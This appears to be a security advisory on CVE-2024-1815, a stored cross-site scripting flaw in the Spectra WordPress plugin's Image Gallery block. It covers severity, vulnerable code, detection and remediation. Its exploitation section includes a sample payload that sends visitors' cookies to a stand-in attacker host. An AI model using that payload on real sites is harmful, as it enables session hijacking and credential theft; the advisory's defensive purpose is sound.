CVE-2024-1815
Executive Summary
CVE-2024-1815 is a Stored Cross-Site Scripting (XSS) vulnerability in the Spectra – WordPress Gutenberg Blocks plugin, affecting all versions up to and including 2.12.8. The flaw resides in the plugin's Image Gallery block, where user-supplied attributes are not properly sanitized or escaped. An authenticated attacker with contributor-level access or higher can inject arbitrary web scripts into pages. When a victim visits the compromised page, the injected script executes in their browser, potentially leading to session hijacking, credential theft, or further compromise of the WordPress site.
This vulnerability is specific to the WordPress ecosystem and does not involve Apache or Nginx directly. The plugin is widely used, making this a significant supply chain risk for WordPress sites.

Supply Chain & Package Security
The Spectra plugin is distributed via the official WordPress plugin repository. Since no patch has been released, all sites using versions <= 2.12.8 are at risk. Administrators should monitor the plugin's update channel and consider disabling the Image Gallery block until a fix is available.
CVSS Breakdown & Threat Level
- CVSS Score: 6.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor-level)
- User Interaction: None
- Scope: Changed
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
The medium severity reflects the need for authenticated access, but the low complexity and potential for widespread impact (due to stored XSS) elevate the risk for WordPress sites with multiple contributors.
Deep Dive & Mechanics
The vulnerability exists in the spectra/image-gallery block. When rendering the block, the plugin uses user-supplied attributes (e.g., imgLink, caption, altText) without proper sanitization or output escaping. An attacker with contributor-level access can craft a malicious block attribute containing JavaScript code. When the block is rendered on a page, the injected script is stored in the database and executed in the browser of any visitor.
The root cause is insufficient input validation in the block's render_callback function. The plugin fails to apply esc_attr() or wp_kses() to attributes before outputting them in HTML attributes or inline JavaScript.
Vulnerable vs. Patched Code
Vulnerable Code (<= 2.12.8):
// In render_callback for image-gallery block
$img_link = $attributes['imgLink'];
echo '<a href="' . $img_link . '">'; // No escaping
Patched Code (Hypothetical):
$img_link = esc_url( $attributes['imgLink'] );
echo '<a href="' . $img_link . '">';
The patched version would use esc_url() for URLs and esc_attr() for other attributes, preventing script injection.
Exploitation & Lab Setup
Red Team (Exploitation)
- Prerequisites: WordPress site with Spectra plugin <= 2.12.8, contributor-level account.
- Steps:
- Log in as a contributor.
- Create a new post or page.
- Add the "Image Gallery" block.
- In the block's attribute field (e.g.,
imgLink), inject a payload:" onmouseover="alert('XSS')" - Save and publish the page.
- When any user visits the page, the script executes.
Example Payload:
<img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
Blue Team (Detection & Hardening)
- Input Validation: Implement a Web Application Firewall (WAF) rule to block suspicious attributes in block content.
- Content Security Policy (CSP): Add a strict CSP header to mitigate XSS impact.
- User Education: Restrict contributor-level access to trusted users only.
- Plugin Monitoring: Disable the Image Gallery block until a patch is available.
Indicators of Compromise (IOCs)
- Network: Outbound HTTP requests to unknown domains from WordPress admin pages.
- File: Modified post/page content containing
<script>tags or event handlers in block attributes. - Log: WordPress audit logs showing creation of posts with unusual block attributes.
- Browser: Console errors or unexpected pop-ups when visiting pages with the Image Gallery block.

Remediation & Mitigation
- Immediate: Disable the Image Gallery block in Spectra plugin settings or remove the plugin entirely if not critical.
- Short-term: Implement a WAF rule to block XSS payloads in block attributes.
- Long-term: Apply a patch when the vendor releases one. Consider forking the plugin to apply the fix yourself.
- Alternative: Use a different gallery plugin that is actively maintained and patched.
